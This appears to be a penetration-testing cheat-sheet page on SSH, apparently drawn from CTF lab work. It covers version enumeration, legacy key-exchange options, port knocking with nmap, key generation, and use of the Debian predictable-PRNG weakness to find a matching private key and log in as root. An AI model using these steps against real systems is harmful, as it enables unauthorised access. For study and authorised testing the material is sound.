SSH

Enumeration

Identify OS version from OpenSSH Version

https://packages.ubuntu.com/search?keywords=openssh-server

Error: SSH Private Keys Are Too Open

chmod 600 ~/.ssh/id_rsa
ssh user@<IP> -i id_rsa

If Faced With Error:

no matching key exchange method found. Their offer: gss-group1-sha1-toWM5Slw5Ew8Mqkay+al2g==,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1

Solution:

ssh sunny@10.10.10.76 -p 22022 -oKexAlgorithms=+diffie-hellman-group1-sha1

#To SSH using DSA private key, add to etc/ssh/ssh_config)
PubkeyAcceptedKeyTypes +ssh-dss

Port Knock

for i in 571 5292 291;do nmap -Pn --host-timeout 201 --max-retries 0 -p $i <IP>; done

Generate Private & Public Keys

//Private Key
openssl genrsa -out private.pem 2048

//Public Key
openssl rsa -in private.pem -out public.pem -pubout -outform PEM

OpenSSH 4.3p2 Exploit

Exploit Link
Predictable PRNG

$ ssh-keygen -l -f targetkey.pub
2048 c6:7b:14:fa:ae:b6:89:e6:67:17:ee:04:17:b0:ec:4e targetkey.pub

If we look at the public key in an editor, we can also infer that the key type is RSA. In order to locate the private key for this public key, we need to extract the data files, and look for a file named:

rsa/2048/**c67b14faaeb689e66717ee0417b0ec4e-26670**

In the example above, the fingerprint is represented in hexadecimal with the colons removed, and the process ID is indicated as "26670". If we want to authenticate to a vulnerable system that uses this public key for authentication, we would run the following command:

$ ssh -i rsa/2048/c67b14faaeb689e66717ee0417b0ec4e-26670 root@targetmachine

PreviousMail Servers NextSMB

Last updated 2 years ago